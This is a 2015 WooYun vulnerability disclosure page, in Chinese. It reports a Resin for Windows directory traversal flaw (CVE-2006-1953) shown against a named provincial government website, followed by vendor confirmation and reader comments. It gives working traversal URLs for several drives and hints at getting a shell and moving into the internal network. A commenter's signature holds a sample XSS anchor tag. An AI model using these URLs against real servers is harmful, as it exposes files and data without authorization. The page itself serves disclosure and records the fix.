当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128045

漏洞标题:Resin漏洞利用案例之Windows全盘遍历漏洞(以某省戒毒所为例)

相关厂商:安徽省戒毒管理局

漏洞作者: Wulala

提交时间:2015-07-21 10:33

修复时间:2015-09-06 09:26

公开时间:2015-09-06 09:26

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

Resin漏洞利用第二弹,虽然Resin漏洞利用的局限性比较大,但是这个漏洞的威力还是蛮大的.

详细说明:

Resin Windows远程目录遍历漏洞
漏洞信息:
CVE-2006-1953
受影响系统:
Caucho Technology Resin v3.0.18 for Windows
Caucho Technology Resin v3.0.17 for Windows
测试代码:
http://victim:8080/C:%5C/
漏洞参考:
http://www.nsfocus.net/vulndb/8829
https://www.rapid7.com/resources/advisories/R7-0024.jsp
总的来说,Resin漏洞利用的限制还是比较苛刻的,不过有时候也可以成为渗透攻击的一个突破口.
下面以安徽省戒毒管理所为例:
http://www.ahljj.gov.cn/
漏洞利用:
http://www.ahljj.gov.cn/C:%5C/
http://www.ahljj.gov.cn/D:%5C/
http://www.ahljj.gov.cn/E:%5C/
遍历Windows下所有盘下的文件(配置文件/源码/数据库/各种福利..). 渗透的目的就是为了获取数据,一部到位.
下面Getshell和内网的姿势就很多了,各位可以随意发挥了.

漏洞证明:

C盘

图像 007.png


D盘

图像 008.png


E盘

图像 009.png

修复方案:

升级到Resin v3.0.19或以上

版权声明:转载请注明来源 Wulala@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-23 09:25

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-21 10:34 | Wulala ( 普通白帽子 | Rank:223 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

    秒审核,给力

  2. 2015-07-21 10:35 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    Resin真正的任意文件读取案例

  3. 2015-07-21 10:35 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    火钳流氓

  4. 2015-07-21 10:37 | Wulala ( 普通白帽子 | Rank:223 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

    @疯狗 可惜只能Windows,应用不是很广.

  5. 2015-07-21 10:38 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Wulala 那也是成功案例哈,比resuin-doc那种实在

  6. 2015-07-21 10:40 | Wulala ( 普通白帽子 | Rank:223 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

    @疯狗 恩恩, 这种漏洞往往有意想不到的效果哈..

  7. 2015-07-21 10:58 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @疯狗 http://www.wooyun.org/bugs/wooyun-2015-0127830/trace/c2d7ef0e873001******狗哥

  8. 2015-07-21 14:03 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @DloveJ 过咯

  9. 2015-07-21 14:09 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @疯狗 谢谢狗哥 亲亲@*@

  10. 2015-07-23 13:11 | Aerfa21 ( 普通白帽子 | Rank:165 漏洞数:44 )

    dz,试过resin文件包含,getshell方法么?

  11. 2015-09-06 22:57 | 无力落地の白 ( 实习白帽子 | Rank:48 漏洞数:19 | 新人)